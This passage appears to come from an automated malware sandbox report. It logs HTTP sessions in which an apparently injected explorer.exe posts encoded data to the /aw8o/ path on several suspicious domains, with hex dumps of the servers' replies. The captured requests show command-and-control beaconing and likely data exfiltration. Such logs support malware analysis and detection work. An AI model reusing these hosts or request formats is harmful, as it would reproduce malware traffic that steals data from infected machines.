                                                                                                                                                                                          Data Ascii: Hv~U/x>24@kVAERAP)mTA_4L632t3b#Zn9.eHvo~1*~3_Y_haJ%Uw*ev%2W6x_(V[S9N$?<yN&9hZD$u]qd&[}~FP"7C8>=t}S79


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          3192.168.11.204971896.44.182.13180C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:18:58.663892031 CEST274OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.handsome-sex.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.handsome-sex.com
                                                                                                                                                                                          Referer: http://www.handsome-sex.com/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 186
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 77 78 6d 35 47 4f 41 34 65 4e 6b 78 68 75 5a 62 62 6b 4b 58 4d 59 38 42 33 34 49 6c 56 32 42 79 7a 61 41 75 7a 6e 61 6a 53 50 74 7a 6b 76 65 58 74 6e 32 5a 7a 6a 66 61 43 6a 73 39 54 39 68 5a 59 58 71 53 5a 4a 44 4f 78 34 69 66 41 77 4f 55 50 2b 52 31 62 4c 38 51 53 4e 43 42 72 32 43 71 74 55 45 6a 61 36 54 72 4f 6b 58 47 79 41 4c 65 71 71 68 78 73 64 49 72 4d 7a 70 49 52 62 50 65 4f 6b 64 54 70 6a 41 65 44 54 42 38 56 7a 4d 66 67 42 39 68 64 55 32 47 33 30 32 72 31 57 78 4c 30 69 39 64 2b 79 74 69 32 64 4d 6e 75 51 49 39 46 77 3d 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=wxm5GOA4eNkxhuZbbkKXMY8B34IlV2ByzaAuznajSPtzkveXtn2ZzjfaCjs9T9hZYXqSZJDOx4ifAwOUP+R1bL8QSNCBr2CqtUEja6TrOkXGyALeqqhxsdIrMzpIRbPeOkdTpjAeDTB8VzMfgB9hdU2G302r1WxL0i9d+yti2dMnuQI9Fw==
                                                                                                                                                                                          Aug 10, 2023 10:18:58.828387022 CEST275INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                          content-length: 1238
                                                                                                                                                                                          date: Thu, 10 Aug 2023 08:19:00 GMT
                                                                                                                                                                                          server: LiteSpeed
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                                                                                                                          Aug 10, 2023 10:18:58.828464985 CEST276INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                                                                                                                          Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          30192.168.11.2049745119.18.54.5180C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:20:26.111767054 CEST1090OUTGET /aw8o/?1NM6e=JHyqG6c0VkX+12EdRRnMiv591CJu3XVJOhv6jqyuy3yB/QILPRQMYUaLAuC7PLR0Wsfx0havIXAbx1R+v/HWlYVUV6jOtwoJGQ==&P4=_n5TPHiTKZj HTTP/1.1
                                                                                                                                                                                          Host: www.ladakhzesmo.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344439030 CEST1091INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:20:26 GMT
                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Data Raw: 33 65 35 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 69 66 28 21 22 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 69 64 3d 22 32 31 66 64 63 61 32 32 38 31 38 33 33 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 61 72 61 6d 73 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 61 72 61 6d 73 3d 22 22 7d 69 66 28 21 28 22 63 6d 70 5f 68 6f 73 74 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 68 6f 73 74 3d 22 61 2e 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 6e 3d 22 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 72 6f 74 6f 3d 22 68 74 74 70 73 3a 22 7d 69 66 28 21 28 22 63 6d 70 5f 63 6f 64 65 73 72 63 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 6f 64 65 73 72 63 3d 22 31 22 7d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 5b 22 44 45 22 2c 22 45 4e 22 2c 22 46 52 22 2c 22 49 54 22 2c 22 4e 4f 22 2c 22 44 41 22 2c 22 46 49 22 2c 22 45 53 22 2c 22 50 54 22 2c 22 52 4f 22 2c 22 42 47 22 2c 22 45 54 22 2c 22 45 4c 22 2c 22 47 41 22 2c 22 48 52 22 2c 22 4c 56 22 2c 22 4c 54 22 2c 22 4d 54 22 2c 22 4e 4c 22 2c 22 50 4c 22 2c 22 53 56 22 2c 22 53 4b 22 2c 22 53 4c 22 2c 22 43 53 22 2c 22 48 55 22 2c 22 52 55 22 2c 22 53 52 22 2c 22 5a 48 22 2c 22 54 52 22 2c 22 55 4b 22 2c 22 41 52 22 2c 22 42 53 22 5d 3b 69 66 28 22 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 7b 62 2e 70 75 73 68 28 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 61 5d 2e 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7d 7d 72 65 74 75 72 6e 20 62 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 52 54 4c 4c 61 6e 67 73 3d
                                                                                                                                                                                          Data Ascii: 3e56<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR","ZH","TR","UK","AR","BS"];if("cmp_customlanguages" in window){for(var a=0;a<window.cmp_customlanguages.length;a++){b.push(window.cmp_customlanguages[a].l.toUpperCase())}}return b};window.cmp_getRTLLangs=
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344516993 CEST1093INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5b 22 41 52 22 5d 3b 69 66 28 22 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 77 69 6e 64 6f 77 2e 63
                                                                                                                                                                                          Data Ascii: function(){var a=["AR"];if("cmp_customlanguages" in window){for(var b=0;b<window.cmp_customlanguages.length;b++){if("r" in window.cmp_customlanguages[b]&&window.cmp_customlanguages[b].r){a.push(window.cmp_customlanguages[b].l)}}}return a};wind
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344574928 CEST1094INData Raw: 6c 73 65 7b 69 66 28 68 3d 3d 22 22 29 7b 68 3d 22 45 4e 22 7d 7d 68 3d 68 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 68 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 3d 64 6f 63 75 6d 65 6e 74 3b 76 61 72 20 76
                                                                                                                                                                                          Data Ascii: lse{if(h==""){h="EN"}}h=h.toUpperCase();return h};(function(){var u=document;var v=u.getElementsByTagName;var h=window;var o="";var b="_en";if("cmp_getlang" in h){o=h.cmp_getlang().toLowerCase();if("cmp_customlanguages" in h){for(var q=0;q<h.c
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344630957 CEST1095INData Raw: 22 3f 22 26 63 6d 70 72 65 67 75 6c 61 74 69 6f 6e 6b 65 79 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 66 29 3a 22 22 29 2b 28 72 21 3d 22 22 3f 22 26 63 6d 70 67 70 70 6b 65 79 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d
                                                                                                                                                                                          Data Ascii: "?"&cmpregulationkey="+encodeURIComponent(f):"")+(r!=""?"&cmpgppkey="+encodeURIComponent(r):"")+(n!=""?"&cmpatt="+encodeURIComponent(n):"")+("cmp_params" in h?"&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o=
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344686031 CEST1097INData Raw: 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 3d
                                                                                                                                                                                          Data Ascii: gth==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablock
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344741106 CEST1098INData Raw: 22 29 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 54 43 44 61 74 61 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d
                                                                                                                                                                                          Data Ascii: ")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344799042 CEST1099INData Raw: 28 67 3d 3d 3d 22 68 61 73 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 46 69 65 6c 64 22 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68
                                                                                                                                                                                          Data Ascii: (g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344857931 CEST1101INData Raw: 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 74 79 70 65 6f 66 28 77 69 6e 64 6f
                                                                                                                                                                                          Data Ascii: dow)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghan
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344914913 CEST1102INData Raw: 70 6c 6f 72 65 66 72 65 65 72 65 73 75 6c 74 73 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70
                                                                                                                                                                                          Data Ascii: plorefreeresults.com/px.js?ch=1"></script><script type="text/javascript" src="http://explorefreeresults.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement(
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344970942 CEST1103INData Raw: 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 75 72 6c 28 22 68 74 74 70 3a
                                                                                                                                                                                          Data Ascii: dia__/fonts/montserrat-regular/montserrat-regular.woff") format("woff"),url("http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2") format("woff2"),url("http://i3.cdn-image.com/__media__/fonts/montserrat-regular/
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472068071 CEST1105INData Raw: 72 72 61 74 2d 62 6f 6c 64 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 62 6f 6c 64 2e 73 76 67 23 6d 6f 6e 74 73 65 72 72 61 74 2d 62 6f 6c 64 22 29 20 66 6f 72 6d 61 74 28 22 73 76 67 22 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b
                                                                                                                                                                                          Data Ascii: rrat-bold/montserrat-bold.svg#montserrat-bold") format("svg");font-weight: normal;font-style: normal;font-display: swap;}*{margin:0; padding:0}a {text-decoration:none; outline:none}a img {border:none}li {list-style:none}.clear


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          31192.168.11.204974643.154.67.17080C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:20:36.294109106 CEST1127OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.fgnvcmef.click
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.fgnvcmef.click
                                                                                                                                                                                          Referer: http://www.fgnvcmef.click/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 186
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 5a 6e 32 4d 43 46 6f 57 2b 48 69 38 57 41 55 56 58 78 56 62 58 34 38 33 36 6a 30 48 6e 69 45 65 56 6d 42 45 4f 37 7a 69 56 69 7a 4a 65 48 44 66 47 2b 64 77 59 4e 71 32 57 61 7a 49 43 45 52 57 54 6e 7a 70 53 69 37 4c 71 46 35 63 7a 64 4b 4a 6d 32 58 48 36 4b 74 44 65 59 67 72 52 51 37 72 6e 33 4b 65 50 6a 69 66 37 55 71 48 5a 38 5a 4d 34 61 49 42 6f 66 72 30 76 46 77 51 66 51 65 6a 38 57 68 47 33 7a 51 59 41 62 41 73 7a 64 48 48 78 70 77 66 6c 73 4a 73 4a 2f 49 70 30 31 68 58 65 4e 52 53 72 35 6b 43 57 33 4e 71 6f 79 6b 66 4e 51 3d 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=Zn2MCFoW+Hi8WAUVXxVbX4836j0HniEeVmBEO7ziVizJeHDfG+dwYNq2WazICERWTnzpSi7LqF5czdKJm2XH6KtDeYgrRQ7rn3KePjif7UqHZ8ZM4aIBofr0vFwQfQej8WhG3zQYAbAszdHHxpwflsJsJ/Ip01hXeNRSr5kCW3NqoykfNQ==
                                                                                                                                                                                          Aug 10, 2023 10:20:36.549787045 CEST1127INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:20:36 GMT
                                                                                                                                                                                          Content-Length: 18
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                                                                                                                                          Data Ascii: 404 page not found


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          32192.168.11.204974743.154.67.17080C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:20:39.075086117 CEST1129OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.fgnvcmef.click
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.fgnvcmef.click
                                                                                                                                                                                          Referer: http://www.fgnvcmef.click/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 526
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
